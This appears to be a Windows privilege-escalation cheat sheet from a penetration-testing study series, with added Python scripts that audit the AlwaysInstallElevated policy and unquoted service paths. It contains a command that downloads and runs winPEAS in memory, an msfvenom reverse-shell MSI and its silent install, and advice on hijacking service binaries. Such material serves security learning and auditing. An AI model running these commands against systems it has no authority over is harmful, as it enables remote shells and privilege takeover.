🪟 Windows Privilege Escalation

Check for misconfigurations, vulnerable services, and abusable privileges.

➡️ Environment: See 00_environment_setup


🔍 Basic Enum

systeminfo
whoami /priv
net user
ipconfig /all

🧰 Tools

winPEAS.ps1 (download and run in memory):

iwr -UseBasicParsing "https://raw.githubusercontent.com/peass-ng/PEASS-ng/refs/heads/master/winPEAS/winPEASps1/winPEAS.ps1" | iex


🪜 AlwaysInstallElevated

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
# If both = 1 → generate MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f msi > shell.msi
msiexec /quiet /qn /i shell.msi
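The two `reg query` lines above only tell you something when you read both results together: the policy is active only if the DWORD is 1 under HKCU *and* HKLM, and a missing key or value counts as disabled. The following is an added audit helper, not part of the original cheat sheet or of any tool it names. It parses the text that `reg query` prints (the sample outputs are constructed, not captured from a real host) and gives a single yes/no verdict; the `query_live` helper, which shells out to `reg`, is an assumption about how you would wire it to a real machine.

```python
import re
import subprocess

# Constructed sample output of the two `reg query` commands (not from a real host).
# On a correctly configured host the value is absent or 0x0 under at least one hive.
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

SAMPLE_HKLM = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# What `reg query` prints when the policy key has never been created.
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

_VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)", re.IGNORECASE)

def parse_always_install_elevated(reg_output: str) -> int:
    """Return the AlwaysInstallElevated DWORD found in `reg query` output.

    A missing value, a missing key, or an error message all return 0, which is
    how Windows Installer treats them (policy disabled).
    """
    m = _VALUE_RE.search(reg_output)
    return int(m.group(1), 16) if m else 0

def is_always_install_elevated(hkcu_output: str, hklm_output: str) -> bool:
    """The policy takes effect only when BOTH the user and machine values are 1."""
    return (parse_always_install_elevated(hkcu_output) == 1
            and parse_always_install_elevated(hklm_output) == 1)

def query_live() -> bool:
    """Run the two `reg query` commands on the local Windows host (assumed wiring)."""
    key = r"Software\Policies\Microsoft\Windows\Installer"
    outputs = []
    for hive in ("HKCU", "HKLM"):
        proc = subprocess.run(["reg", "query", f"{hive}\\{key}"],
                              capture_output=True, text=True)
        # reg.exe writes "ERROR: ..." to stderr; fold it in so parsing sees it.
        outputs.append(proc.stdout + proc.stderr)
    return is_always_install_elevated(*outputs)

if __name__ == "__main__":
    print("constructed sample, both hives 0x1 ->",
          is_always_install_elevated(SAMPLE_HKCU, SAMPLE_HKLM))
    print("constructed sample, HKLM key missing ->",
          is_always_install_elevated(SAMPLE_HKCU, SAMPLE_MISSING))
```

Remediation is the matching GPO setting (Computer and User Configuration, Windows Components, Windows Installer, "Always install with elevated privileges") set to Disabled, after which both queries return either no value or 0x0 and the check reports False.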

🔧 Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\"
# If any spaces in path without quotes → replace first binary
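The `wmic | findstr` one-liner above finds candidate services but leaves the actual decision to the reader: a path is only a problem if it is unquoted *and* has a space somewhere before the executable name, and what matters for both attacker and defender is which intermediate files Windows would try first. The block below is an added audit script, not from the original page or from winPEAS. It parses `wmic service get name,pathname,startmode /format:csv` (the CSV variant of the same command, so fields are unambiguous), applies the same Auto-only and not-under-`C:\Windows\` filters as the one-liner, and for every unquoted path lists the locations whose parent-directory ACLs you must review. The sample output is constructed, and the `run_live` helper is an assumption about how to call `wmic` from Python.

```python
import re
import subprocess
from typing import Dict, List

# Constructed output of `wmic service get name,pathname,startmode /format:csv`
# (not from a real host). wmic prepends a Node column and a blank line.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST01,VulnSvc,C:\Program Files\Vuln App\Bin\service.exe -run,Auto
HOST01,SafeSvc,"C:\Program Files\Safe App\svc.exe" -run,Auto
HOST01,ManualSvc,C:\Program Files\Other App\other.exe,Manual
"""

def executable_part(pathname: str) -> str:
    """Drop service arguments: keep everything up to the first '.exe' (case-insensitive)."""
    m = re.search(r"\.exe", pathname, re.IGNORECASE)
    return pathname[: m.end()] if m else pathname

def search_order_paths(pathname: str) -> List[str]:
    """Files CreateProcess would try before the real binary for an unquoted path.

    Returns an empty list when the path is quoted or the executable part has no
    spaces, i.e. when the service is not affected.
    """
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []
    parts = executable_part(pathname).split(" ")
    if len(parts) < 2:
        return []
    # For C:\Program Files\Vuln App\Bin\service.exe Windows tries
    # C:\Program.exe, then C:\Program Files\Vuln.exe, then the real file.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def parse_wmic_csv(text: str) -> List[Dict[str, str]]:
    """Parse wmic's CSV output without the csv module, which would strip the
    surrounding quotes from a quoted PathName and hide the very thing we check."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue
        _node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)   # PathName may itself contain commas
        rows.append({"name": name, "pathname": pathname.strip(), "startmode": startmode.strip()})
    return rows

def find_unquoted_service_paths(text: str, auto_only: bool = True,
                                skip_windows_dir: bool = True) -> Dict[str, List[str]]:
    """Map service name -> paths to review, mirroring the findstr filters above."""
    findings: Dict[str, List[str]] = {}
    for svc in parse_wmic_csv(text):
        if auto_only and svc["startmode"].lower() != "auto":
            continue
        if skip_windows_dir and svc["pathname"].lower().startswith("c:\\windows\\"):
            continue
        paths = search_order_paths(svc["pathname"])
        if paths:
            findings[svc["name"]] = paths
    return findings

def run_live() -> Dict[str, List[str]]:
    """Collect from the local host (assumed wiring; wmic is deprecated on recent Windows)."""
    proc = subprocess.run(["wmic", "service", "get", "name,pathname,startmode", "/format:csv"],
                          capture_output=True, text=True)
    return find_unquoted_service_paths(proc.stdout)

if __name__ == "__main__":
    for name, paths in find_unquoted_service_paths(SAMPLE_WMIC_CSV).items():
        print(f"{name}: review write access to the parent directory of each of {paths}")
```

The fix is the usual one: wrap the ImagePath value in quotes (`sc config <svc> binPath= "\"C:\Program Files\Vuln App\Bin\service.exe\" -run"`) and confirm that non-administrators cannot create files in the directories the script lists; a finding is only exploitable when one of those directories is writable by a low-privileged account.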

🔐 SeImpersonatePrivilege

Use Juicy Potato, PrintSpoofer, or RoguePotato if enabled.

whoami /priv | findstr SeImpersonatePrivilege

📡 Registry Auto-run

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Next: 06_active_directory